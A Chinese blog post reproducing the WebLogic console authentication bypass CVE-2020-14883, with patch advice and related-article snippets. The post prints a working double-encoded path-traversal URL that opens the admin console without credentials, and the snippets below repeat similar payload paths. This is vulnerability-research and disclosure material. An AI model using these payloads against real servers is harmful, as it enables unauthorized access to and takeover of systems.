weblogic权限绕过漏洞(CVE-2020-14883)

已于 2023-12-27 16:11:35 修改
阅读量420 收藏 4
点赞数 7
文章标签: python 网络安全 web安全
于 2023-12-27 15:10:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135246715
版权

漏洞描述:

未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,成功登录后台。

复现过程:

1.访问http://ip:port/console

2.访问

http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28"com.bea%3AName%3Dbase_domain%2CType%3DDomain"%29

修复建议:

及时更新补丁,参考oracle官网发布的补丁:

Oracle Critical Patch Update Advisory - October 2020

Oracle Critical Patch Update Advisory - October 2020 (Traditional Format)

慕筱蚺
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic——CVE_2020_14882
qq_17622203的博客
03-21 5204
影响版本 Oracle Weblogic Server 10.3.6.0.0Oracle Weblogic Server 12.1.3.0.0Oracle Weblogic Server 12.2.1.3.0Oracle Weblogic Server 12.2.1.4.0Oracle Weblogic Server 14.1.1.0.0 转自:weblogic 未授权命令执行漏洞CVE-2020-14882,CVE-2020-14883)复现 - My_Dreams - 博客园 vulfocus开
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
WebLogic权限绕过(CVE-2020-14750)
m0_65150886的博客
12-28 594
Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞,该漏洞CVE-2020-14882 补丁的绕过,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。2.Edge浏览器绕过登陆的url。
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 563
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
漏洞复现】Weblogic未授权命令执行漏洞CVE-2020-14882)
weixin_43486390的博客
12-17 1777
CVE-2020-14882
weblogic权限绕过/远程命令执行漏洞复现(CVE-2020-14482、CVE-2020-14883)
LuckySec
12-03 6840
0x01 漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求
Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1543
weblogic漏洞复现
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
cve_2020_14883.zip
05-28
weblogic 解决CVE-2020-14883漏洞
WeblogicCVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6023
WeblogicCVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
CVE-2020-14882&14883漏洞复现
m0_52089634的博客
01-03 1492
CVE漏洞复现
CVE-2020-14882&14883:weblogic 未授权命令执行漏洞复现
Jietewang的博客
12-01 1622
1.Weblogic简介 Oracle WebLogic Server是用于构建和部署企业Java EE应用程序的业界最佳应用程序服务器,并支持新功能,这些新功能可降低运营成本,提高性能,增强可伸缩性并支持Oracle Applications产品组合。 这是一个Java的中间件,本人是这么理解的那要想更加详细的理解请查看官方介绍【官方介绍】。 2.漏洞描述 复现漏洞编号CVE-2020-14882,CVE-2020-14883 可以构造特殊的HTTP请求,在未经身份验证的情况下访问Weblogi
weblogic RCE(CVE-2020-14882 CVE-2020-14883) 复现
SopRomeo的博客
03-10 710
影响版本 Weblogic : 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 vulhub 一键起即可 CVE-2020-14882 未授权访问 http://10.219.64.141:7001/console/css/%252e%252e%252fconsole.portal 这个payload其实是经过了2次url编码 访问如下url即可越权访问后台 CVE-2020-14883 payload一: console/css/
Weblogic取消身份验证远程命令执行 CVE-2020-14882,CVE-2020-14883 漏洞复现
ADummy的博客
03-01 483
Weblogic取消身份验证远程命令执行(CVE-2020-14882,CVE-2020-14883) by ADummy 0x00利用路线 ​ url直接命令执行/构造xml文件让weblogic服务器访问。 0x01漏洞介绍 ​ Oracle WebLogic Server是行业领先的应用程序服务器,用于使用Java EE标准构建企业应用程序,并在可靠的,可扩展的运行时上以较低的拥有成本进行部署。 在2020年10月的Oracle重要补丁更新咨询中,Oracle修复了由Chaitin Tech的
CVE-2020-14882&14883 Weblogic 管理控制台未授权远程命令执行漏洞复现
ierciyuan的博客
07-30 928
CVE-2020-14882&14883Weblogic管理控制台未授权远程命令执行漏洞复现。提供相关软件包(网盘)
weblogic权限绕过远程命令执行漏洞复现(CVE-2020-14482、CVE-2020-14883)
又菜又爱倒腾的博客
10-29 2284
#weblogic权限绕过/远程命令执行漏洞CVE-2020-14482、CVE-2020-14883) # 一、漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14
weblogic-cve-2020-25516
07-25
C知道: 对于您提到的Weblogic漏洞CVE-2020-25516,这是一个已经被公开披露的漏洞,它影响了Oracle WebLogic Server的某些版本。 具体来说,这个漏洞是由于WebLogic Server管理控制台的不当权限验证机制所导致的。攻击者可以通过发送特制的HTTP请求利用该漏洞,进而绕过身份验证并获取未授权的访问权限。 为了保护您的WebLogic Server不受到此漏洞的影响,您可以考虑以下几点操作: 1. 及时升级:请确保您所使用的WebLogic Server版本已经升级到最新的补丁版本。Oracle通常会发布相应的安全补丁来修复已知漏洞。 2. 限制访问:通过配置网络防火墙或其他访问控制措施,限制对WebLogic管理控制台的访问。仅允许受信任的IP地址或网络段进行访问。 3. 强化密码策略:确保使用强密码,并定期更改密码。避免使用默认或弱密码。 4. 监控日志:定期检查WebLogic Server的日志文件,以便及时发现异常活动或潜在的攻击行为。 5. 及时补丁:密切关注Oracle官方发布的安全公告和更新,及时应用相关补丁。 请注意,这些仅是一些建议,您应根据实际情况和安全需求采取适当的措施来保护您的系统。建议您与IT安全专家或团队合作,以寻求更详细的建议和指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值